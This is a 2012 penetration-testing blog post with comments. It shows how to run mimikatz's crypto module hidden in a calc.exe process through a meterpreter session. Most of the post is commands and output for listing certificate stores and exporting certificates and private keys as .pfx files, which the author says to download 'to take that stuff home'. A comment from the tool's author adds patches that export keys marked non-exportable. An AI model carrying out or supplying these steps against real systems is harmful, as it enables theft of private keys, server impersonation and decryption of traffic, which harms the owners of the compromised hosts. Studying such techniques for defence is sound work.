carnal0wnage [Shared Reader]

Loading...

Monday, October 15, 2012

More with Mimikatz (Crypto Module)

So we all know that mimikatz dumps hashes and passwords!!! from memory which is the shiznazzle.

But, now that its working in memory, you can do lots more with it. Below are the various modules

    • "standard" ; commandes de base
    • crypto ; Cryptographie et certificats
    • sekurlsa ; Dump de hashes et de mots de passes Windows
    • system ; Gestion système
    • process ; Manipulation des processus
    • thread ; Manipulation des threads
    • service ; Manipulation des services
    • privilege ; Manipulation des privilèges
    • winmine ; Manipulation du démineur de Windows XP (démonstration)
    • minesweeper ; Manipulation du démineur de Windows Vista et 7 (démonstration)
    • nogpo ; Pour éviter quelques GPO triviales
    • samdump ; Dump de SAM offline
    • inject ; Injecteur de librairies
    • ts ; Manipulations Terminal Server
    • divers ; Fonctions diverses trop petites pour s’émanciper

The Crypto module does some interesting things.  I briefly talked about stealing certificates at DerbyCon. the crypto module helps you do this.

Things you are probably intersted in are:

crypto::listkeys, crypto::listProviders, crypto::listStores, crypto::listCertificates

to identify fun stuff that you want for your own from the host.

then crypto::exportKeys and crypto::exportCertifcates

to take that stuff home.

kinda looks like this:

meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listStores" exit'
Process 9904 created. Channel 20 created. mimikatz 1.0 x86 (RC)   /* Traitement du Kiwi (Sep  8 2012 15:18:27) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::listStores
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'
        My
        Root
        Trust
        CA
        TrustedPublisher
        Disallowed
        AuthRoot
        TrustedPeople
        ADDRESSBOOK


 mimikatz(commandline) # exit


execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit'
Process 3472 created.
Channel 12 created.
mimikatz 1.0 x86 (RC)   /* Traitement du Kiwi (Sep  6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz

 mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
         - sqlapps01
                Container Clé : SELFSSL
                Provider      : Microsoft RSA SChannel Cryptographic Provider
                Type          : AT_KEYEXCHANGE
                Exportabilité : OUI
                Taille clé    : 1024

 mimikatz(commandline) # exit


execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit'
Process 6112 created.
Channel 23 created.
mimikatz 1.0 x86 (RC)   /* Traitement du Kiwi (Sep  6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz

 mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
         - MACHINENAME
                Container Clé : SELFSSL
                Provider      : Microsoft RSA SChannel Cryptographic Provider
                Type          : AT_KEYEXCHANGE
                Exportabilité : OUI
                Taille clé    : 1024
                Export privé dans  'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.pfx' : OK
                Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.der' : OK

 mimikatz(commandline) # exit

once exported you download the .pfx and .der files

Posted by CG at 10:00 AM

Labels: , , ,

3 comments:

dre said...

Maybe the next mimikatz feature can be Internet-happy English translations

October 15, 2012 at 11:16 AM
Gentil Kiwi said...

No

:)

October 15, 2012 at 11:28 AM
Gentil Kiwi said...

btw, don't forget :
- crypto::patchcapi
or/and
- privilege::debug
- crypto::patchcng

it export "no exportable" ;)

October 15, 2012 at 1:44 PM

Post a Comment

Subscribe to: Post Comments (Atom)